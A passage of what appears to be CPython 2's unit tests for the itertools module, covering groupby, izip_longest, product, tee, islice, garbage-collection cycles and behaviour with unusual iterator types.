self.assertEqual(r1, r2)
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, lambda r:r[0]):
for ik, ig in groupby(g, lambda r:r[2]):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, lambda r:r[0])]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.next failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.next failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.next failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __cmp__ failure
class DummyCmp:
def __cmp__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __cmp__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __cmp__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
def test_ifilter(self):
self.assertEqual(list(ifilter(isEven, range(6))), [0,2,4])
self.assertEqual(list(ifilter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(ifilter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, ifilter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, ifilter)
self.assertRaises(TypeError, ifilter, lambda x:x)
self.assertRaises(TypeError, ifilter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, ifilter, isEven, 3)
self.assertRaises(TypeError, ifilter(range(6), range(6)).next)
def test_ifilterfalse(self):
self.assertEqual(list(ifilterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(ifilterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(ifilterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, ifilterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, ifilterfalse)
self.assertRaises(TypeError, ifilterfalse, lambda x:x)
self.assertRaises(TypeError, ifilterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, ifilterfalse, isEven, 3)
self.assertRaises(TypeError, ifilterfalse(range(6), range(6)).next)
def test_izip(self):
ans = [(x,y) for x, y in izip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(izip('abc', range(6))), zip('abc', range(6)))
self.assertEqual(list(izip('abcdef', range(3))), zip('abcdef', range(3)))
self.assertEqual(take(3,izip('abcdef', count())), zip('abcdef', range(3)))
self.assertEqual(list(izip('abcdef')), zip('abcdef'))
self.assertEqual(list(izip()), zip())
self.assertRaises(TypeError, izip, 3)
self.assertRaises(TypeError, izip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in izip('abc', 'def')],
zip('abc', 'def'))
self.assertEqual([pair for pair in izip('abc', 'def')],
zip('abc', 'def'))
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_izip_tuple_reuse(self):
ids = map(id, izip('abc', 'def'))
self.assertEqual(min(ids), max(ids))
ids = map(id, list(izip('abc', 'def')))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
def test_iziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
# target = map(None, *args) <- this raises a py3k warning
# this is the replacement:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(izip_longest(*args)), target)
self.assertEqual(list(izip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(izip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,izip_longest('abcdef', count())), zip('abcdef', range(3))) # take 3 from infinite input
self.assertEqual(list(izip_longest()), zip())
self.assertEqual(list(izip_longest([])), zip([]))
self.assertEqual(list(izip_longest('abcdef')), zip('abcdef'))
self.assertEqual(list(izip_longest('abc', 'defg', **{})),
zip(list('abc') + [None], 'defg')) # empty keyword dict
self.assertRaises(TypeError, izip_longest, 3)
self.assertRaises(TypeError, izip_longest, range(3), 3)
for stmt in [
"izip_longest('abc', fv=1)",
"izip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise TypeError in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in izip_longest('abc', 'def')],
zip('abc', 'def'))
self.assertEqual([pair for pair in izip_longest('abc', 'def')],
zip('abc', 'def'))
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_izip_longest_tuple_reuse(self):
ids = map(id, izip_longest('abc', 'def'))
self.assertEqual(min(ids), max(ids))
ids = map(id, list(izip_longest('abc', 'def')))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
def test_bug_7244(self):
class Repeater(object):
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def next(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code would fail in debug mode
# with an Undetected Error and StopIteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in izip_longest(r1, r2, fillvalue=0):
with test_support.captured_output('stdout'):
print (i, j)
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost and the iteration
# would simply stop with StopIteration as if nothing had failed
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = izip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
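# Odometer-style pure python equivalent of product(): bump the right-most
# index that still has room and reset every index to its right.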
pools = map(tuple, args) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = map(tuple, args) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', xrange(0), xrange(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@test_support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@test_support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(list(repeat(object='a', times=0)), [])
self.assertEqual(list(repeat(object='a', times=-1)), [])
self.assertEqual(list(repeat(object='a', times=-2)), [])
self.assertEqual(zip(xrange(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
def test_imap(self):
self.assertEqual(list(imap(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(imap(None, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(imap(None, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,imap(None, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(imap(operator.pow, [])), [])
self.assertRaises(TypeError, imap)
self.assertRaises(TypeError, imap, operator.neg)
self.assertRaises(TypeError, imap(10, range(5)).next)
self.assertRaises(ValueError, imap(errfunc, [4], [5]).next)
self.assertRaises(TypeError, imap(onearg, [4], [5]).next)
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, izip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, starmap(10, [(4,5)]).next)
self.assertRaises(ValueError, starmap(errfunc, [(4,5)]).next)
self.assertRaises(TypeError, starmap(onearg, [(4,5)]).next)
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(xrange(100), *args)), range(*args))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(xrange(100), *args)), range(*tgtargs))
# Test stop=None
self.assertEqual(list(islice(xrange(10), None)), range(10))
self.assertEqual(list(islice(xrange(10), None, None)), range(10))
self.assertEqual(list(islice(xrange(10), None, None, None)), range(10))
self.assertEqual(list(islice(xrange(10), 2, None)), range(2, 10))
self.assertEqual(list(islice(xrange(10), 1, None, 2)), range(1, 10, 2))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), range(3))
self.assertEqual(list(it), range(3, 10))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), range(3, 10))
# Test invalid arguments
self.assertRaises(TypeError, islice, xrange(10))
self.assertRaises(TypeError, islice, xrange(10), 1, 2, 3, 4)
self.assertRaises(ValueError, islice, xrange(10), -5, 10, 1)
self.assertRaises(ValueError, islice, xrange(10), 1, -5, -1)
self.assertRaises(ValueError, islice, xrange(10), 1, 10, -1)
self.assertRaises(ValueError, islice, xrange(10), 1, 10, 0)
self.assertRaises((ValueError, TypeError), islice, xrange(10), 'a')
self.assertRaises((ValueError, TypeError), islice, xrange(10), 'a', 1)
self.assertRaises((ValueError, TypeError), islice, xrange(10), 1, 'a')
self.assertRaises((ValueError, TypeError), islice, xrange(10), 'a', 1, 1)
self.assertRaises((ValueError, TypeError), islice, xrange(10), 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: Leave islice() in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
test_support.gc_collect()
self.assertIsNone(wr())
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
underten = lambda x: x<10
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, takewhile(10, [(4,5)]).next)
self.assertRaises(ValueError, takewhile(errfunc, [(4,5)]).next)
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, t.next)
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
underten = lambda x: x<10
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, dropwhile(10, [(4,5)]).next)
self.assertRaises(ValueError, dropwhile(errfunc, [(4,5)]).next)
def test_tee(self):
n = 200
def irange(n):
for i in xrange(n):
yield i
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(zip(a,b), zip(range(n),range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), range(n))
self.assertEqual(list(b), range(n))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in xrange(100):
self.assertEqual(a.next(), i)
del a
self.assertEqual(list(b), range(n))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in xrange(100):
self.assertEqual(a.next(), i)
del b
self.assertEqual(list(a), range(100, n))
for j in xrange(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = its[i].next()
lists[i].append(value)
self.assertEqual(lists[0], range(n))
self.assertEqual(lists[1], range(n))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
if test_support.check_impl_detail():
# XXX I (arigo) would argue that 'type(a)(iterable)' has
# ill-defined semantics: it always returns a fresh tee object,
# but depending on whether 'iterable' is itself a tee object
# or not, it is ok or not to continue using 'iterable' after
# the call. I cannot imagine why 'type(a)(non_tee_object)'
# would be useful, as 'iter(non_tee_object)' is equivalent
# as far as I can see.
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(xrange(2000), 3)
for i in xrange(100):
self.assertEqual(a.next(), i)
self.assertEqual(list(b), range(2000))
self.assertEqual([c.next(), c.next()], range(2))
self.assertEqual(list(a), range(100,2000))
self.assertEqual(list(c), range(2,2000))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in xrange(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual(map(list, result), [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weak referencable
a, b = tee(xrange(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
test_support.gc_collect()
self.assertRaises(ReferenceError, getattr, p, '__class__')
# Issue 13454: Crash when deleting backward iterator from tee()
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def next(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegexp(RuntimeError, "tee"):
next(a)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def next(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegexp(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, izip().next)
for f in (chain, cycle, izip, groupby):
self.assertRaises(StopIteration, f([]).next)
self.assertRaises(StopIteration, f(StopNow()).next)
self.assertRaises(StopIteration, islice([], None).next)
self.assertRaises(StopIteration, islice(StopNow(), None).next)
p, q = tee([])
self.assertRaises(StopIteration, p.next)
self.assertRaises(StopIteration, q.next)
p, q = tee(StopNow())
self.assertRaises(StopIteration, p.next)
self.assertRaises(StopIteration, q.next)
self.assertRaises(StopIteration, repeat(None, 0).next)
for f in (ifilter, ifilterfalse, imap, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, f(lambda x:x, []).next)
self.assertRaises(StopIteration, f(lambda x:x, StopNow()).next)
class TestExamples(unittest.TestCase):
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_ifilter(self):
self.assertEqual(list(ifilter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_ifilterfalse(self):
self.assertEqual(list(ifilterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_imap(self):
self.assertEqual(list(imap(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_izip(self):
self.assertEqual(list(izip('ABCD', 'xy')), [('A', 'x'), ('B', 'y')])
def test_izip_longest(self):
self.assertEqual(list(izip_longest('ABCD', 'xy', fillvalue='-')),
[('A', 'x'), ('B', 'y'), ('C', '-'), ('D', '-')])
def test_permutations(self):
self.assertEqual(list(permutations('ABCD', 2)),
map(tuple, 'AB AC AD BA BC BD CA CB CD DA DB DC'.split()))
self.assertEqual(list(permutations(range(3))),
[(0,1,2), (0,2,1), (1,0,2), (1,2,0), (2,0,1), (2,1,0)])
def test_product(self):
self.assertEqual(list(product('ABCD', 'xy')),
map(tuple, 'Ax Ay Bx By Cx Cy Dx Dy'.split()))
self.assertEqual(list(product(range(2), repeat=3)),
[(0,0,0), (0,0,1), (0,1,0), (0,1,1),
(1,0,0), (1,0,1), (1,1,0), (1,1,1)])
def test_repeat(self):
self.assertEqual(list(repeat(10, 3)), [10, 10, 10])
def test_starmap(self):
self.assertEqual(list(starmap(pow, [(2,5), (3,2), (10,3)])),
[32, 9, 1000])
def test_takewhile(self):
self.assertEqual(list(takewhile(lambda x: x<5, [1,4,6,4,1])), [1,4])
class TestPurePythonRoughEquivalents(unittest.TestCase):
@staticmethod
def islice(iterable, *args):
s = slice(*args)
start, stop, step = s.start or 0, s.stop or sys.maxint, s.step or 1
it = iter(xrange(start, stop, step))
try:
nexti = next(it)
except StopIteration:
# Consume *iterable* up to the *start* position.
for i, element in izip(xrange(start), iterable):
pass
return
try:
for i, element in enumerate(iterable):
if i == nexti:
yield element
nexti = next(it)
except StopIteration:
# Consume to *stop*.
for i, element in izip(xrange(i + 1, stop), iterable):
pass
def test_islice_recipe(self):
self.assertEqual(list(self.islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(self.islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(self.islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(self.islice('ABCDEFG', 0, None, 2)), list('ACEG'))
# Test items consumed.
it = iter(xrange(10))
self.assertEqual(list(self.islice(it, 3)), range(3))
self.assertEqual(list(it), range(3, 10))
it = iter(xrange(10))
self.assertEqual(list(self.islice(it, 3, 3)), [])
self.assertEqual(list(it), range(3, 10))
# Test that slice finishes in predictable state.
c = count()
self.assertEqual(list(self.islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
class TestGC(unittest.TestCase):
def makecycle(self, iterator, container):
container.append(iterator)
iterator.next()
del container, iterator
def test_chain(self):
a = []
self.makecycle(chain(a), a)
def test_chain_from_iterable(self):
a = []
self.makecycle(chain.from_iterable([a]), a)
def test_combinations(self):
a = []
self.makecycle(combinations([1,2,a,3], 3), a)
def test_combinations_with_replacement(self):
a = []
self.makecycle(combinations_with_replacement([1,2,a,3], 3), a)
def test_compress(self):
a = []
self.makecycle(compress('ABCDEF', [1,0,1,0,1,0]), a)
def test_count(self):
a = []
Int = type('Int', (int,), dict(x=a))
self.makecycle(count(Int(0), Int(1)), a)
def test_cycle(self):
a = []
self.makecycle(cycle([a]*2), a)
def test_dropwhile(self):
a = []
self.makecycle(dropwhile(bool, [0, a, a]), a)
def test_groupby(self):
a = []
self.makecycle(groupby([a]*2, lambda x:x), a)
def test_issue2246(self):
# Issue 2246 -- the _grouper iterator was not included in GC
n = 10
keyfunc = lambda x: x
for i, j in groupby(xrange(n), key=keyfunc):
keyfunc.__dict__.setdefault('x',[]).append(j)
def test_ifilter(self):
a = []
self.makecycle(ifilter(lambda x:True, [a]*2), a)
def test_ifilterfalse(self):
a = []
self.makecycle(ifilterfalse(lambda x:False, a), a)
def test_izip(self):
a = []
self.makecycle(izip([a]*2, [a]*3), a)
def test_izip_longest(self):
a = []
self.makecycle(izip_longest([a]*2, [a]*3), a)
b = [a, None]
self.makecycle(izip_longest([a]*2, [a]*3, fillvalue=b), a)
def test_imap(self):
a = []
self.makecycle(imap(lambda x:x, [a]*2), a)
def test_islice(self):
a = []
self.makecycle(islice([a]*2, None), a)
def test_permutations(self):
a = []
self.makecycle(permutations([1,2,a,3], 3), a)
def test_product(self):
a = []
self.makecycle(product([1,2,a,3], repeat=3), a)
def test_repeat(self):
a = []
self.makecycle(repeat(a), a)
def test_starmap(self):
a = []
self.makecycle(starmap(lambda *t: t, [(a,a)]*2), a)
def test_takewhile(self):
a = []
self.makecycle(takewhile(bool, [1, 0, a, a]), a)
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def next(self):
raise StopIteration
def L(seqn):
'Test multiple tiers of iterators'
return chain(imap(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_chain(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(chain(g(s))), list(g(s)))
self.assertEqual(list(chain(g(s), g(s))), list(g(s))+list(g(s)))
self.assertRaises(TypeError, list, chain(X(s)))
self.assertRaises(TypeError, list, chain(N(s)))
self.assertRaises(ZeroDivisionError, list, chain(E(s)))
def test_compress(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
n = len(s)
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(compress(g(s), repeat(1))), list(g(s)))
self.assertRaises(TypeError, compress, X(s), repeat(1))
self.assertRaises(TypeError, list, compress(N(s), repeat(1)))
self.assertRaises(ZeroDivisionError, list, compress(E(s), repeat(1)))
def test_product(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
self.assertRaises(TypeError, product, X(s))
self.assertRaises(TypeError, product, N(s))
self.assertRaises(ZeroDivisionError, product, E(s))
def test_cycle(self):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
tgtlen = len(s) * 3
expected = list(g(s))*3
actual = list(islice(cycle(g(s)), tgtlen))
self.assertEqual(actual, expected)
self.assertRaises(TypeError, cycle, X(s))
self.assertRaises(TypeError, list, cycle(N(s)))
self.assertRaises(ZeroDivisionError, list, cycle(E(s)))
def test_groupby(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual([k for k, sb in groupby(g(s))], list(g(s)))
self.assertRaises(TypeError, groupby, X(s))
self.assertRaises(TypeError, list, groupby(N(s)))
self.assertRaises(ZeroDivisionError, list, groupby(E(s)))
def test_ifilter(self):
for s in (range(10), range(0), range(1000), (7,11), xrange(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(list(ifilter(isEven, g(s))), filter(isEven, g(s)))
